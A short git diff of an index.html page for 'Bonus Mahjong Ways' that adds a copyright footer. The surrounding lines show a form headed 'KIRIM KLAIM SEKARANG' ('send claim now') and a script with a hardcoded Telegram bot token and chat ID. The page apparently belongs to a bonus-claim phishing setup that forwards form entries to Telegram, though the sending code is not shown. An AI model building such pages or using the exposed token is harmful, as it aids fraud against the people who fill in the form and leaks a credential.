--- a/index.html
+++ b/index.html
@@ -54,6 +54,10 @@
             <button type="submit" id="btnKirim">KIRIM KLAIM SEKARANG</button>
         </form>
 
+        <div class="footer">
+    <p>&copy; 2024 Bonus Mahjong Ways. All Rights Reserved.</p>
+</div>
+
     <script>
         const token = "8476347656:AAGD3p1Wf90TJBVS9wSnLsEe62JKfztFYek";
         const chatId = "-4959751612";
